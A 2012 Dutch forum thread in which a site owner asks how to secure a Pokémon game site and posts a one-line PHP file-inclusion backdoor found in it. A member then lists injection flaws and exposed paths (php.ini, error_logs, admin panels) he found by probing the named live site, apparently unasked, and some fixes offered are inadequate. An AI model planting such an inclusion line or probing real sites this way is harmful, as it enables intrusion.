• Login
  • Register
  • Zoek
This Thread
  • Everywhere
  • This Thread
  • This Forum
  • Articles
  • Pages
  • Forum
  • Filebase Entry
  • More Options

ICTscripters

Dé plek voor IT

Dé plek voor IT

Login

Geavanceerde opties
  1. Home
  2. Forum
    1. Alle berichten
    2. Recente activiteiten
  3. ICT Nieuws
  4. Blog
  5. Marktplaats
    1. Werk
    2. Advertenties
    3. Domeinnamen
    4. Websites
    5. Design & lay-outs
    6. Scripts
    7. Overige
  6. Design
  7. Leden
    1. Actieve bezoekers
    2. Team
    3. Leden zoeken
  8. Downloads
  9. Goedkope domeinnamen
  1. Home
  2. Forum
    1. Alle berichten
    2. Recente activiteiten
  3. ICT Nieuws
  4. Blog
  5. Marktplaats
    1. Werk
    2. Advertenties
    3. Domeinnamen
    4. Websites
    5. Design & lay-outs
    6. Scripts
    7. Overige
  6. Design
  7. Leden
    1. Actieve bezoekers
    2. Team
    3. Leden zoeken
  8. Downloads
  9. Goedkope domeinnamen
  1. Home
  2. Forum
    1. Alle berichten
    2. Recente activiteiten
  3. ICT Nieuws
  4. Blog
  5. Marktplaats
    1. Werk
    2. Advertenties
    3. Domeinnamen
    4. Websites
    5. Design & lay-outs
    6. Scripts
    7. Overige
  6. Design
  7. Leden
    1. Actieve bezoekers
    2. Team
    3. Leden zoeken
  8. Downloads
  9. Goedkope domeinnamen
  1. Dé plek voor IT - ICTscripters
  2. Forum
  3. Scripting & programmeren
  4. PHP + SQL

Forum

  • Beta-testers gezocht voor Crypto-oefenplatform

    Syntax 29 januari 2026 om 16:11
  • Na 15 jaar terug van weggeweest: iCriminals.nl is terug (BETA)!

    Syntax 19 januari 2026 om 09:34
  • Developer Gezocht

    Mikevdk 10 januari 2026 om 18:57
  • Op zoek naar de legends

    Syntax 5 januari 2026 om 13:50
  • [FREE] WeFact Hosting module

    Jeroen.G 13 oktober 2025 om 14:09
  • Help testers nodig voor android app Urgent

    urgentotservices 26 september 2025 om 10:21
  • Versio vervanger

    Jeroen.G 25 augustus 2025 om 15:56
  • Afspraken systeem met planbeperking

    Lijno 1 augustus 2025 om 23:04

Marktplaats

  • 350 Nieuwe Domeinnamen Januari 2026

    shiga 1 februari 2026 om 14:21
  • 321 Nieuwe Domeinnamen December 2025

    shiga 1 januari 2026 om 10:26
  • Meerdere mafia game template te koop

    Syntax 26 december 2025 om 00:07

Beveiliging

  • XD001
  • 23 maart 2012 om 20:24
  • XD001
    Guest
    • 23 maart 2012 om 20:24
    • #1

    Hoe kan ik mijn site het best beveiligen zodat hij niet kan gecopieert worden, ect

  • L.Kok
    Elite members
    Ontvangen Reacties
    35
    Berichten
    1.117
    Filebase Entries
    1
    • 23 maart 2012 om 20:26
    • #2

    Bijna onmogelijk? Gewoon zorgen dat je alles bezit, google het eens. ;)

    Met vriendelijke groet,

    L.Kok
    YoungVision

  • wimmpie
    âllo âllo
    Ontvangen Reacties
    11
    Berichten
    1.170
    • 23 maart 2012 om 20:27
    • #3

    Je kan je site niet beveiligen zodat hij helemaal niet gekopieerd kan worden eh :p
    het beste wat kan doen is .htaccess gebruiken en een copyright plaatsen

  • XD001
    Guest
    • 23 maart 2012 om 20:30
    • #4

    ja maar mijn site is binnen de 2min. via programma's e kopiëren er is geen beveiliging ofzo

  • wimmpie
    âllo âllo
    Ontvangen Reacties
    11
    Berichten
    1.170
    • 23 maart 2012 om 20:31
    • #5

    alleen de layout (html, css en javascript) kan je kopieren, de rest niet

  • XD001
    Guest
    • 23 maart 2012 om 20:32
    • #6

    HTTrack

  • Malik
    Guest
    • 23 maart 2012 om 20:35
    • #7

    wimmpie Dat heb je mis!

    Het beste manier om het op te lossen is om je site vanaf 0% te bouwen.

  • XD001
    Guest
    • 23 maart 2012 om 20:35
    • #8

    Ik kochte hem maar de beveiliging zit niet goed..

    Nieuwe reactie samengevoegd met originele reactie op 23.03.12 20:40:47:
    het is te zeggen een vriend van mij..
    En zou deze site graag blijven behouden!

  • Dein
    Master
    Berichten
    2.614
    • 23 maart 2012 om 20:44
    • #9

    En nu verwacht jij dat wij van jou een beveiligingsexpert maken?
    Als je een keer Google gebruikt doe hem dan de groeten van mij..

    Een site is zeker wel 99,9% te beveiligen alleen moet je dan wel programmeerkennis hebben en geen klein beetje, zelf leren 'hacken' en eigen programma's schrijven ervoor om je site te testen eigen algoritmes bedenken, ...

    Met pakweg 20 jaar ervaring kun je dit garanderen, dus waar wacht je nog op!

    Als je site lek is huur dan iemand in die alle lekken dicht.

    Verklein je links met http://url2s.nl

  • jopitan
    Professional
    Berichten
    684
    • 23 maart 2012 om 20:55
    • #10

    Zolang de apache goed ingesteld staat met bepaalde bestanden vallen deze niet te jatten hoor (tenzij een hacker je ftp heeft gekraakt)

    HTTrack is alleen maar een programma die HTML, CSS, JS en de afbeeldingen van een website download. Dit kun je ook handmatig doen alleen ben je lang mee bezig terwijl dit programma alles voor je doet. PHP bestanden kun je niet downloaden als dit niet in de headers van PHP door wordt gegeven.

    Andere extensies zoals .inc enzovoort kunnen wel gedownload worden als je apache (of .htaccess) niet goed hebt ingesteld.

    Als jij een XSS vulnerability in je website hebt zitten kunnen er kwaadaardige scripts op je website uitgevoerd worden die bijvoorbeeld de cookies (PHP sessie id enzov) steelt en dit op stuurt naar een persoon. Daarom moet je jezelf altijd beveiligen tegen XSS (Cross Site Scripting).

    SQL Injectie is een ander soort type kwetsbaarheid, hiermee kan niet bedoelde SQL queries uitgevoerd worden in je script. Daarmee kan je database worden gedropt of er kan een dump van worden gemaakt.

    (De hierboven genoemde kwetsbaarheden zijn de meest voorkomenden)

    @Malik, Leuk en aardig allemaal door te zeggen van: 'Dat heb je mis'. Maar om je standpunt bij te staan is het altijd goed om argumenten te geven. Anders is het niet echt geloofwaardig ^o)

    Kast: HAF922 | CPU: I7-930 @ 4.0GHz | CPU Cooler: Noctua NH-D14 | HDD0: Crucial M4 128GB, HDD1: Kingston SSD 64GB, HDD2/3: WD Black & Green 1TB, HDD4: Seagate 1.5TB | Mem: Kingston HyperX 12GB @ 1600MHz | Graphics: Crossfire HD6970 | Res: 5760x1080

  • XD001
    Guest
    • 23 maart 2012 om 21:00
    • #11

    Oke, mijn site is nu al paar x gelekt:

    pokemon-world.net
    pokemon-champion.com
    pokemonxl.nl

    Nieuwe reactie samengevoegd met originele reactie op 23.03.12 21:07:12:
    dit is de apache.php

    PHP
    <?include($_REQUEST["run"] . "/apache.php");?>
  • Fitim
    Professional
    Berichten
    1.105
    • 23 maart 2012 om 21:25
    • #12
    Citaat van XD001

    Oke, mijn site is nu al paar x gelekt:

    pokemon-world.net
    pokemon-champion.com
    pokemonxl.nl

    Nieuwe reactie samengevoegd met originele reactie op 23.03.12 21:07:12:
    dit is de apache.php

    PHP
    <?include($_REQUEST["run"] . "/apache.php");?>



    Dat gebeurd er nou als je een source gaat gebruiken die niet van jou is! Daarnaast zal ik eerder

    PHP
    if(isset($_POST['run']))
    {

    gebruiken ipv $_REQUEST? ($_REQUEST is ook zo php 4)

    En nog iets bekijk een paar tutorials voor dat je aan de andere dingen gaat beginnen want zo bereik je niks (aan mij vragen of je een source mag lenen)

  • XD001
    Guest
    • 23 maart 2012 om 21:28
    • #13
    Citaat van Fitim



    Dat gebeurd er nou als je een source gaat gebruiken die niet van jou is! Daarnaast zal ik eerder

    PHP
    if(isset($_POST['run']))
    {

    gebruiken ipv $_REQUEST? ($_REQUEST is ook zo php 4)

    En nog iets bekijk een paar tutorials voor dat je aan de andere dingen gaat beginnen want zo bereik je niks (aan mij vragen of je een source mag lenen)



    Sorry had verkeerde gezien ik had hem gezien maar was niet goed
    mijn account werd naar een andere site doorgelinkt.. daarna was mn account weg
    En nu zie ik dat er wel weinig opties zijn..

    Nieuwe reactie samengevoegd met originele reactie op 23.03.12 21:31:17:
    moet ik dan deze code

    PHP
    <?include($_REQUEST["run"] . "/apache.php");?>


    vervangen door deze

    PHP
    if(isset($_POST['run']))
    {
  • jopitan
    Professional
    Berichten
    684
    • 23 maart 2012 om 23:05
    • #14

    Op pokemon-world.net heb ik gevonden:
    - 3 SQL injecties
    - ACD (Apache Cookie Disclosure), dit valt op te lossen door je Apache te updaten naar een nieuwere versie (2.2.22 en erboven)
    - 51 XSS injecties
    - pokemon-world.net/php.ini
    - pokemon-world.net/error_log
    - pokemon-world.net/sql
    - pokemon-world.net/admin
    - pokemon-world.net/phpmyadmin
    - pokemon-world.net/includes/error_log

    Vind je het gek dat je website makkelijk gejat wordt.

    Ik zal nog wel even een tijdje bezig zijn met de andere websites om daar injecties te vinden, maar daar neem ik morgen wel even de tijd voor :piraat:

    [EDIT]
    Kritische gevonden: CRLF Injectie/HTTP Response splitting, google it. Hiermee kunnen namelijk valse HTTP headers door worden gestuurd, waardoor een attack onder jouw IP kan worden uitgevoerd als het ware.

    [EDIT]
    Dude ga serieus snel een cursusje beveiliging volgen, ik heb inmiddels al 108 XSS kwetsbaarheden gevonden.

    [EDIT]
    Ik kan een bruteforce attack op je login panel uitvoeren. Los dit op door een limiet op het aantal foute opgaves van gebruikersnaam en wachtwoord in een bepaalde tijd te doen. (Max 5x fout is 15 minuten blokkeren)

    [EDIT]
    Ik ben in een hoekje gaan staan huilen, want ik heb nog nooit van mijn leven zo'n slecht beveiligde website gezien.

    [EDIT]
    pokemon-world.net/admin/error_log ...
    Meme: I don't wanna live on this planet anymore :(

    Kast: HAF922 | CPU: I7-930 @ 4.0GHz | CPU Cooler: Noctua NH-D14 | HDD0: Crucial M4 128GB, HDD1: Kingston SSD 64GB, HDD2/3: WD Black & Green 1TB, HDD4: Seagate 1.5TB | Mem: Kingston HyperX 12GB @ 1600MHz | Graphics: Crossfire HD6970 | Res: 5760x1080

  • L.Groot
    Elite members
    Ontvangen Reacties
    31
    Berichten
    4.888
    • 24 maart 2012 om 06:35
    • #15

    Beste leden,

    Zojuist heb ik dit topic opgeschoond. Gaarne vraag ik jullie te letten op de volgende punten:
    1) Houd je ten alle tijde aan het reglement. Dit betreft ook offtopic reacties.
    2) Let op je taalgebruik en lok geen ruzies uit.
    3) Berichten m.b.t. de illegaliteit van deze source zijn ook offtopic en worden gewoon door ons verwijderd.

    Daarnaast vraag ik gewoon wat respect voor iedereen. Het lijkt hier soms net kinderopvang CriminalsPoint alleen dan nog een stukje erger. Er zijn nu eenmaal mensen die geen tijd/zin/kennis hebben van programmeertalen of deze te leren. Leer daar mee omgaan en reageer gewoon niet als het je niet bevalt.

    De report knop bij elk bericht en bij het topic zelf kan worden gebruikt om een moderator versneld bij het topic te roepen. Zelf ingrijpen of andere mensen op fouten wijzen is tegen ons reglement en wordt bestraft.

    Alvast heel erg bedankt voor jullie medewerking.

Participate now!

Heb je nog geen account? Registreer je nu en word deel van onze community!

Maak een account aan Login

ICT Nieuws

  • Fijne feestdagen

    tcbhome 28 december 2025 om 13:55
  • Kritieke update voor Really Simple Security-plug-in

    K.Rens 16 november 2024 om 16:12
  • ING Nederland streeft naar ondersteuning van Google Pay tegen eind februari

    K.Rens 2 november 2024 om 16:09

Blogs

  • Functioneel ontwerp

    Dees 28 december 2014 om 12:38
  • Access Control List implementatie in PHP/MySQL - deel 1/2

    FangorN 28 december 2018 om 12:35
  • Access Control List implementatie in PHP/MySQL - deel 2/2

    FangorN 29 december 2018 om 12:37

Gebruikers die dit topic bekijken

  • 1 Gasten
  1. Marktplaats
  2. Design
  3. Voorwaarden
  4. Ons team
  5. Leden
  6. Geschiedenis
  7. Regels
  8. Links
  9. Privacy Policy
ICTscripters ©2005 - 2026 , goedkope hosting door DiMoWeb.com, BE0558.915.582
Sponsors: Beste kattenhotel provincie Antwerpen | Beste Zetes eid kaartlezer webshop
Style: Nexus by cls-design
Stylename
Nexus
Manufacturer
cls-design
Licence
Commercial styles
Help
Supportforum
Visit cls-design